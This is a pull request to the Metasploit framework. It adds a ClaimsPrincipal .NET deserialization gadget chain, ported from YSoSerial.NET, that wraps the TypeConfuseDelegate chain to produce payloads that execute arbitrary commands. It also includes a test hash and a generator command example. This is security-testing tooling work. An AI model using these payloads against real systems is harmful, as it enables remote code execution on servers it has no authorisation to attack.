### PR TITLE
Add the ClaimsPrincipal .NET gadget chain

### DIFF
--- a/lib/msf/util/dot_net_deserialization.rb
+++ b/lib/msf/util/dot_net_deserialization.rb
@@ -86,6 +86,8 @@ module DotNetDeserialization
   # @return [Types::SerializedStream]
   def self.generate_gadget_chain(cmd, gadget_chain: DEFAULT_GADGET_CHAIN)
     case gadget_chain
+    when :ClaimsPrincipal
+      stream = GadgetChains::ClaimsPrincipal.generate(cmd)
     when :TextFormattingRunProperties
       stream = GadgetChains::TextFormattingRunProperties.generate(cmd)
     when :TypeConfuseDelegate

--- a/lib/msf/util/dot_net_deserialization/formatters/soap_formatter.rb
+++ b/lib/msf/util/dot_net_deserialization/formatters/soap_formatter.rb
@@ -81,7 +81,7 @@ module SoapFormatter
   end
 
   def self.generate(stream)
-    unless stream.is_a?(GadgetChains::TextFormattingRunProperties) || stream.is_a?(GadgetChains::WindowsIdentity)
+    unless stream.is_a?(GadgetChains::ClaimsPrincipal) || stream.is_a?(GadgetChains::TextFormattingRunProperties) || stream.is_a?(GadgetChains::WindowsIdentity)
       raise ::NotImplementedError, 'Stream is not supported by this formatter'
     end
 

--- a/lib/msf/util/dot_net_deserialization/gadget_chains.rb
+++ b/lib/msf/util/dot_net_deserialization/gadget_chains.rb
@@ -5,6 +5,7 @@ module GadgetChains
 
 
 NAMES = [
+  :ClaimsPrincipal,
   :TextFormattingRunProperties,
   :TypeConfuseDelegate,
   :WindowsIdentity

--- a/lib/msf/util/dot_net_deserialization/gadget_chains/claims_principal.rb
+++ b/lib/msf/util/dot_net_deserialization/gadget_chains/claims_principal.rb
@@ -1,0 +1,45 @@
+module Msf
+module Util
+module DotNetDeserialization
+module GadgetChains
+
+  class ClaimsPrincipal < Types::SerializedStream
+
+    # ClaimsPrincipal
+    #   Credits:
+    #     Finders: jang
+    #     Contributors: jang
+    #   References:
+    #     https://peterjson.medium.com/some-notes-about-microsoft-exchange-deserialization-rce-cve-2021-42321-110d04e8852
+
+    def self.generate(cmd)
+      inner = GadgetChains::TypeConfuseDelegate.generate(cmd)
+
+      self.from_values([
+        Types::RecordValues::SerializationHeaderRecord.new(root_id: 1, header_id: -1),
+        Types::RecordValues::SystemClassWithMembersAndTypes.from_member_values(
+          class_info: Types::General::ClassInfo.new(
+            obj_id: 1,
+            name: 'System.Security.Claims.ClaimsPrincipal',
+            member_names: %w{ m_serializedClaimsIdentities }
+          ),
+          member_type_info: Types::General::MemberTypeInfo.new(
+            binary_type_enums: %i{ String },
+          ),
+          member_values: [
+            Types::Record.from_value(Types::RecordValues::BinaryObjectString.new(
+              obj_id: 5,
+              string: Rex::Text.encode_base64(inner.to_binary_s)
+            ))
+          ]
+        ),
+        Types::RecordValues::MessageEnd.new
+      ])
+    end
+
+  end
+
+end
+end
+end
+end

--- a/spec/lib/msf/util/dot_net_deserialization_spec.rb
+++ b/spec/lib/msf/util/dot_net_deserialization_spec.rb
@@ -18,6 +18,7 @@ RSpec.describe Msf::Util::DotNetDeserialization do
       # this is a quick but important check to ensure consistency of the
       # serialized payloads which are deterministic
       table = {
+        :ClaimsPrincipal             => '3f7232efeed59104840b199c5261e5769f4dc30a',
         :TextFormattingRunProperties => '8aa639e141b325e8bf138d09380bdf7714f70c72',
         :TypeConfuseDelegate         => '97cf63717ea751f81c382bd178fdf56d0ec3edb1',
         :WindowsIdentity             => '8dab1805a165cabea8ce96a7721317096f072166'


### PR DESCRIPTION
This ports the [ClaimsPrincipal](https://github.com/pwntester/ysoserial.net/blob/master/ysoserial/Generators/ClaimsPrincipalGenerator.cs) .NET Deserialization Gadget chain from the [YSoSerial.NET](https://github.com/pwntester/ysoserial.net) project to Metasploit. This particular gadget chain is very similar to the existing [WindowsIdentity](https://github.com/rapid7/metasploit-framework/blob/d33511ffccb16c91c0037a127c21bd990fd42192/lib/msf/util/dot_net_deserialization/gadget_chains/windows_identity.rb#L6) gadget chain in the sense that it wraps the TypeConfuseDelegate chain.

## Verification

A PR will be submitted in the next couple of days that requires this chain for an exploit. In the mean time, it can be tested using the stand alone generator tool.

From `tools/payloads/ysoserial`:

- [x] Run: `./dot_net.rb -c "cmd.exe" -f BinaryFormatter -g ClaimsPrincipal -o base64`
- [x] Test the generated blob and or compare it to the output from te original YSoSerial.NET tool. It should be identical if the same command is used.